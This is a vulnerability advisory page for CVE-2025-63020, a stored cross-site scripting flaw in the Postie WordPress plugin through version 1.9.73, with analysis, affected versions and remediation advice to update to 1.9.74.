CVE-2025-63020
Lifecycle Timeline
2Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wayne Allen Postie postie allows Stored XSS.This issue affects Postie: from n/a through <= 1.9.73.
Analysis
Stored cross-site scripting (XSS) vulnerability in Wayne Allen Postie WordPress plugin through version 1.9.73 allows authenticated attackers to inject malicious scripts into web pages that execute in the context of other users' browsers. The vulnerability stems from improper input neutralization during web page generation, enabling persistence of injected payloads in the application's data store. No public exploit code or active exploitation has been identified at time of analysis, though the low EPSS score (0.04th percentile) suggests limited real-world exploitation interest despite the vulnerability's presence in a plugin with unknown user base size.
Technical Context
This vulnerability is rooted in CWE-79 (Improper Neutralization of Input During Web Page Generation), a class of input validation and output encoding failures. The Postie plugin, which processes email-to-post functionality in WordPress environments, fails to properly sanitize or escape user-controlled input before rendering it in HTML contexts. Stored XSS differs from reflected XSS in that the malicious payload persists in the application database, affecting all users who view the compromised content rather than requiring individual social engineering. The vulnerability affects the WordPress plugin identified via CPE wp/postie and impacts all versions from the earliest tracked through 1.9.73, indicating the flaw may have existed for an extended period.
Affected Products
Wayne Allen Postie WordPress plugin versions from the earliest tracked through and including version 1.9.73. The plugin is identified by CPE wp/postie and is distributed through the official WordPress plugin repository. This impacts all WordPress installations with the Postie plugin active on versions 1.9.73 or earlier.
Remediation
Update the Wayne Allen Postie plugin to version 1.9.74 or later, which addresses the input neutralization failure. WordPress administrators should navigate to Plugins > Installed Plugins, locate Postie, and click the update button if available, or manually download the patched version from the WordPress plugin repository (https://patchstack.com/database/Wordpress/Plugin/postie/vulnerability/wordpress-postie-plugin-1-9-73-cross-site-scripting-xss-vulnerability). If immediate patching is not possible, temporarily disable the Postie plugin to prevent exploitation vectors while patches are being staged. Review any content created or modified through the Postie plugin in recent months to identify and remediate any stored XSS payloads that may have been injected.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today